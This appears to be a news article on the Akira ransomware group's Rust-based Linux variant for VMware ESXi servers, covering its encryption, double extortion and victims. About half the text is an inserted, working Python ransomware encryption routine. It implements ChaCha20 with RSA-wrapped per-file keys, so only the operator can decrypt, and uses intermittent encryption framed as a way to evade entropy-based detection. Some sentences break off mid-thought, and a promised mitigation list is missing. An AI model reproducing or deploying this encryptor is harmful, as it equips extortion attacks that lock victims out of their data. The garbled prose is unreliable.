The Akira ransomware group, a prominent player in the Ransomware-as-a-Service (RaaS) domain since March 2023, has intensified its operations with a new Linux variant targeting VMware ESXi servers.
Initially focused on Windows systems, Akira expanded its scope in April 2023 by deploying a Linux-based encryptor specifically designed for VMware ESXi servers.
This pivot reflects a broader trend among ransomware groups targeting virtualized environments due to their centralized role in managing enterprise infrastructure.
By compromising an ESXi hypervisor, attackers can simultaneously encrypt multiple virtual machines (VMs), amplifying the attack’s impact.
The new Linux variant is part of an evolving, multi-platform arsenal. Akira's original encryptor was a C++ build for Windows; the group now also ships builds for Linux and VMware ESXi, which shows both its adaptability and the engineering effort behind the operation.
Notably, the Linux encryptor appends the .akira extension to encrypted files and supports partial (intermittent) encryption: encrypting only part of each file is faster and changes far fewer bytes on disk, which blunts detection heuristics that look for whole-file entropy changes.
The Linux version, dubbed Akira v2, is written in Rust, a programming language known for its performance and security features.
Rust binaries are large, statically linked and structured differently from the earlier C++ build, so existing signatures and analysis tooling carry over poorly, making the ransomware harder to analyze and detect. Akira v2 also appends the ".akiranew" extension to encrypted files and employs a tailored encryption process that targets specific file types.
Of particular concern is Akira v2’s ability to encrypt critical system files, including those with extensions like .edb (Exchange database) and .vhd (virtual hard disk).
This capability can have devastating consequences for organizations, potentially crippling email services and virtualized environments.
Additionally, Akira’s ransomware employs a sophisticated hybrid encryption scheme, combining ChaCha20 stream cipher with RSA public-key cryptosystem. This approach allows for efficient encryption of large datasets while maintaining secure key exchange.
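To make the two mechanisms above concrete (the ChaCha20/RSA hybrid scheme, and the partial encryption mentioned earlier), here is an added example written for this page. It is not Akira's code and does not reproduce Akira's file format: the 64 KiB stripe size, the 16 KiB encrypted prefix per stripe, the 44-byte key+nonce wrap and the trailer layout are all assumptions for illustration. ChaCha20 is implemented from RFC 8439 in pure Python so the block runs without third-party packages; the RSA part is textbook RSA with no OAEP padding, which is enough to show the key-wrap idea but not something to copy into a real system.

```python
# Added example, not Akira's code: generic ChaCha20 + RSA hybrid file encryption
# with intermittent ("partial") encryption. Stripe sizes and trailer layout are assumed.
import math
import secrets
import struct

MASK = 0xFFFFFFFF
STRIPE = 64 * 1024          # assumed: walk the file in 64 KiB stripes ...
ENC_PER_STRIPE = 16 * 1024  # ... and encrypt only the first 16 KiB of each

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def _quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 7)

def chacha20_block(key, counter, nonce):
    """One 64-byte keystream block per RFC 8439 (32-byte key, 12-byte nonce)."""
    init = list(struct.unpack("<16I", b"expand 32-byte k" + key
                              + struct.pack("<I", counter) + nonce))
    s = init[:]
    for _ in range(10):  # 20 rounds = 10 column/diagonal double rounds
        _quarter_round(s, 0, 4, 8, 12); _quarter_round(s, 1, 5, 9, 13)
        _quarter_round(s, 2, 6, 10, 14); _quarter_round(s, 3, 7, 11, 15)
        _quarter_round(s, 0, 5, 10, 15); _quarter_round(s, 1, 6, 11, 12)
        _quarter_round(s, 2, 7, 8, 13); _quarter_round(s, 3, 4, 9, 14)
    return struct.pack("<16I", *[(x + y) & MASK for x, y in zip(s, init)])

def chacha20_xor(key, nonce, data, counter):
    """XOR data with keystream starting at block `counter` (encrypt == decrypt)."""
    out = bytearray()
    for i in range(0, len(data), 64):
        ks = chacha20_block(key, counter + i // 64, nonce)
        out += bytes(a ^ b for a, b in zip(data[i:i + 64], ks))
    return bytes(out)

def _is_probable_prime(n, rounds=32):
    # Miller-Rabin: fine for a demo keypair, not a production prime test.
    if n < 2 or any(n % p == 0 for p in (2, 3, 5, 7, 11, 13)):
        return n in (2, 3, 5, 7, 11, 13)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(2 + secrets.randbelow(n - 3), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def rsa_keygen(bits=512):
    """Textbook RSA (no OAEP padding), sized only to wrap a 44-byte key+nonce."""
    def prime(b):
        while True:
            c = secrets.randbits(b) | (1 << (b - 1)) | 1
            if _is_probable_prime(c):
                return c
    while True:
        p, q = prime(bits // 2), prime(bits // 2)
        n, e, phi = p * q, 65537, (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return (n, e), (n, pow(e, -1, phi))

def _xor_stripes(buf, key, nonce):
    # Block counter = byte offset // 64, so no two stripes reuse keystream.
    for start in range(0, len(buf), STRIPE):
        seg = bytes(buf[start:start + ENC_PER_STRIPE])
        buf[start:start + len(seg)] = chacha20_xor(key, nonce, seg, start // 64)

def partial_encrypt(plaintext, pub):
    """Fresh ChaCha20 key+nonce per file; RSA-wrapped copy appended as trailer."""
    n, e = pub
    key, nonce = secrets.token_bytes(32), secrets.token_bytes(12)
    buf = bytearray(plaintext)
    _xor_stripes(buf, key, nonce)
    wrapped = pow(int.from_bytes(key + nonce, "big"), e, n)
    return bytes(buf) + wrapped.to_bytes((n.bit_length() + 7) // 8, "big")

def partial_decrypt(blob, priv):
    """Only the RSA private key (held by the operator) can unwrap the trailer."""
    n, d = priv
    tlen = (n.bit_length() + 7) // 8
    kn = pow(int.from_bytes(blob[-tlen:], "big"), d, n).to_bytes(44, "big")
    buf = bytearray(blob[:-tlen])
    _xor_stripes(buf, kn[:32], kn[32:])
    return bytes(buf)

def encrypted_fraction(size):
    """Share of bytes actually touched: why whole-file entropy checks miss this."""
    touched = sum(min(ENC_PER_STRIPE, size - s) for s in range(0, size, STRIPE))
    return touched / size if size else 0.0
```

The point for defenders is in the last function: with these assumed stripe sizes only a quarter of a large file is ever rewritten, so a detector that waits for whole-file entropy to rise, or counts bytes written, sees far less change than a full-file encryptor produces. The per-file symmetric key is also what makes the scheme fast (one RSA operation per file, stream cipher for the data) and what makes recovery impossible without the operator's private key, since nothing on the victim host can unwrap the trailer.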
The Akira ransomware targeting ESXi servers is built with specific functionalities to exploit vulnerabilities in VMware environments. For instance,
Bitdefender reports that Akira’s victims span various sectors, including manufacturing, education, finance, and critical infrastructure. The United States remains the most affected country, followed by Canada, the United Kingdom, and Germany.
Since its inception, the group has claimed over 350 victims globally and extorted approximately $42 million USD as of April 2024.
The ransomware employs a double-extortion strategy: it exfiltrates sensitive data before encrypting files. Victims are pressured to pay high ransoms under the threat of public data leaks on Akira’s Tor-hosted leak site.
According to the Bitdefender report, the site features a command-line interface: visitors list stolen data with commands such as "leaks" and download it via torrent links.
Organizations can mitigate the risk of Akira ransomware attacks by adopting robust cybersecurity practices:
The emergence of Akira’s Linux variant underscores the growing sophistication of ransomware groups targeting virtualized environments like VMware ESXi servers.
With its ability to exploit vulnerabilities and customize attacks, Akira poses a significant threat to organizations worldwide.